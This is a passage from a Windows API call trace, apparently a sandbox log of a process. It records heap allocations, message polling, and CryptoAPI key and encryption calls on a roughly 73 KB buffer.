dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0172.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0172.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0172.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0172.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0172.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0172.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0172.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0172.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0172.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0172.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0172.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0172.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0172.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0172.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0172.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0172.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0172.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0172.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0172.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0172.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0172.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0172.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0172.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0172.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0172.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0172.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0172.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0172.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0172.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0172.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0172.165] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0172.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0172.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0172.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0172.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0172.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0172.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0172.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.167] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0172.167] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2758, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2758*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.169] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.169] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0172.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0172.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0172.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0172.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.171] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.171] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.171] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.171] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.171] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.171] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.171] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.171] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.171] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.171] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0172.171] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.171] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.171] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.171] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.171] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.172] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.172] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.172] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.172] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.172] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.172] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.172] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.172] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.173] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1201f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x12020) returned 1 [0172.173] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.173] CharLowerBuffW (in: lpsz="byte[73761]", cchLength=0xb | out: lpsz="byte[73761]") returned 0xb [0172.174] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.174] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.174] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa83058*, pdwDataLen=0x87e820*=0x1201f, dwBufLen=0x12020 | out: pbData=0xa83058*, pdwDataLen=0x87e820*=0x12020) returned 1 [0172.175] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.175] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.175] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.183] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0172.183] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.183] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.183] CryptDestroyKey (hKey=0x90af18) returned 1 [0172.186] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.186] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: 